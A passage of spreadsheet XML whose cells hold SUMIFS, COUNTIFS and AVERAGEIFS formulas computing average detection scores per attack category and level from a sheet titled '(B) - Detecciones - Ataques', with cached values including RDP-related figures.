        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH21" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI21" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ21" s="336"/>
      <c r="EK21" s="336"/>
      <c r="EL21" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP12&lt;&gt;0,'(B) - Detecciones - Ataques'!IP12*'(B) - Detecciones - Ataques'!IL12/('(B) - Detecciones - Ataques'!IL12+'(B) - Detecciones - Ataques'!IN12),0)</f>
        <v>0</v>
      </c>
      <c r="EM21" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP12&lt;&gt;0,'(B) - Detecciones - Ataques'!IP12*'(B) - Detecciones - Ataques'!IN12/('(B) - Detecciones - Ataques'!IL12+'(B) - Detecciones - Ataques'!IN12),0)</f>
        <v>0</v>
      </c>
      <c r="EN21" s="626"/>
      <c r="EO21" s="626"/>
      <c r="EP21" s="729"/>
      <c r="EQ21" s="730"/>
      <c r="ER21" s="731" t="s">
        <v>664</v>
      </c>
      <c r="ES21" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER21)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER21 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="ET21" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER21)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER21 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="EU21" s="728">
        <f t="shared" si="16"/>
        <v>0.5</v>
      </c>
      <c r="EV21" s="730"/>
      <c r="EW21" s="732"/>
      <c r="EX21" s="730"/>
      <c r="EY21" s="730"/>
      <c r="EZ21" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="FA21" s="12" t="s">
        <v>2455</v>
      </c>
      <c r="FB21" s="451" t="s">
        <v>2456</v>
      </c>
      <c r="FC21" s="20"/>
      <c r="FD21" s="574"/>
      <c r="FE21" s="574"/>
      <c r="FF21" s="574"/>
      <c r="FG21" s="574"/>
      <c r="FH21" s="574"/>
      <c r="FI21" s="574"/>
      <c r="FJ21" s="574"/>
      <c r="FK21" s="574"/>
      <c r="FL21" s="574"/>
      <c r="FM21" s="574"/>
      <c r="FN21" s="574"/>
      <c r="FO21" s="574"/>
      <c r="FP21" s="574"/>
      <c r="FQ21" s="642" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"RDP")</f>
        <v>RDP</v>
      </c>
      <c r="FR21" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ21)</f>
        <v>0.1666666667</v>
      </c>
      <c r="FS21" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ21)</f>
        <v>0.1666666667</v>
      </c>
      <c r="FT21" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ21)</f>
        <v>0.5</v>
      </c>
      <c r="FU21" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ21)</f>
        <v>2</v>
      </c>
    </row>
    <row r="22">
      <c r="D22" s="173"/>
      <c r="E22" s="173"/>
      <c r="G22" s="644" t="s">
        <v>2671</v>
      </c>
      <c r="H22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, H$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; H$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, H$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; H$21 &amp; "*"
    )
)
</f>
        <v>0.6710071942</v>
      </c>
      <c r="I22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, I$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; I$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, I$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; I$21 &amp; "*"
    )
)
</f>
        <v>0.9997122716</v>
      </c>
      <c r="J22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, J$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; J$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, J$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; J$21 &amp; "*"
    )
)
</f>
        <v>0.5333333333</v>
      </c>
      <c r="K22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, K$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; K$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, K$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; K$21 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="L22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, L$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; L$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, L$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; L$21 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="M22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, M$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; M$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, M$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; M$21 &amp; "*"
    )
)
</f>
        <v>0.7142857143</v>
      </c>
      <c r="N22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, N$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; N$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, N$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; N$21 &amp; "*"
    )
)
</f>
        <v>0.4</v>
      </c>
      <c r="O22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, O$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; O$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, O$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; O$21 &amp; "*"
    )
)
</f>
        <v>0.4209305402</v>
      </c>
      <c r="P22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, P$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; P$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, P$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; P$21 &amp; "*"
    )
)
</f>
        <v>0.5384615385</v>
      </c>
      <c r="Q22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Q$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Q$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Q$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Q$21 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="R22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, R$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; R$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, R$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; R$21 &amp; "*"
    )
)
</f>
        <v>0.8</v>
      </c>
      <c r="S22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$21 &amp; "*"
    )
)
</f>
        <v>0.3968356775</v>
      </c>
      <c r="T22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$21 &amp; "*"
    )
)
</f>
        <v>0.4</v>
      </c>
      <c r="U22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$IP$3:$IP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$21 &amp; "*"
    )
)
</f>
        <v>0.5227272727</v>
      </c>
      <c r="W22" s="644" t="s">
        <v>2671</v>
      </c>
      <c r="X22" s="667">
        <f>IF(X17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,X21))</f>
        <v>0.6753477218</v>
      </c>
      <c r="Y22" s="667">
        <f>IF(Y17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Y21))</f>
        <v>1</v>
      </c>
      <c r="Z22" s="667">
        <f>IF(Z17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Z21))</f>
        <v>0</v>
      </c>
      <c r="AA22" s="667">
        <f>IF(AA17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AA21))</f>
        <v>1</v>
      </c>
      <c r="AB22" s="667">
        <f>IF(AB17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AB21))</f>
        <v>0.9997122716</v>
      </c>
      <c r="AC22" s="667" t="str">
        <f>IF(AC17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AC21))</f>
        <v>-</v>
      </c>
      <c r="AD22" s="667" t="str">
        <f>IF(AD17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AD21))</f>
        <v>-</v>
      </c>
      <c r="AE22" s="667" t="str">
        <f>IF(AE17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AE21))</f>
        <v>-</v>
      </c>
      <c r="AF22" s="667">
        <f>IF(AF17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AF21))</f>
        <v>0.6</v>
      </c>
      <c r="AG22" s="667">
        <f>IF(AG17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AG21))</f>
        <v>0.5</v>
      </c>
      <c r="AH22" s="667" t="str">
        <f>IF(AH17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AH21))</f>
        <v>-</v>
      </c>
      <c r="AI22" s="667">
        <f>IF(AI17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI21))</f>
        <v>0</v>
      </c>
      <c r="AJ22" s="667">
        <f>IF(AJ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ21))</f>
        <v>1</v>
      </c>
      <c r="AK22" s="667">
        <f>IF(AK17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK21))</f>
        <v>0.3333333333</v>
      </c>
      <c r="AL22" s="667" t="str">
        <f>IF(AL17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL21))</f>
        <v>-</v>
      </c>
      <c r="AM22" s="667">
        <f>IF(AM17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM21))</f>
        <v>0</v>
      </c>
      <c r="AN22" s="667" t="str">
        <f>IF(AN17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN21))</f>
        <v>-</v>
      </c>
      <c r="AO22" s="667">
        <f>IF(AO17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO21))</f>
        <v>1</v>
      </c>
      <c r="AP22" s="667">
        <f>IF(AP17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP21))</f>
        <v>0</v>
      </c>
      <c r="AQ22" s="667" t="str">
        <f>IF(AQ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ21))</f>
        <v>-</v>
      </c>
      <c r="AR22" s="667">
        <f>IF(AR17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR21))</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS22" s="667" t="str">
        <f>IF(AS17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS21))</f>
        <v>-</v>
      </c>
      <c r="AT22" s="667">
        <f>IF(AT17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT21))</f>
        <v>0</v>
      </c>
      <c r="AU22" s="667">
        <f>IF(AU17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU21))</f>
        <v>1</v>
      </c>
      <c r="AV22" s="667">
        <f>IF(AV17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV21))</f>
        <v>1</v>
      </c>
      <c r="AW22" s="667">
        <f>IF(AW17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW21))</f>
        <v>1</v>
      </c>
      <c r="AX22" s="667">
        <f>IF(AX17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX21))</f>
        <v>0</v>
      </c>
      <c r="AY22" s="667">
        <f>IF(AY17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY21))</f>
        <v>1</v>
      </c>
      <c r="AZ22" s="667">
        <f>IF(AZ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ21))</f>
        <v>0</v>
      </c>
      <c r="BA22" s="667">
        <f>IF(BA17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA21))</f>
        <v>0</v>
      </c>
      <c r="BB22" s="667">
        <f>IF(BB17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB21))</f>
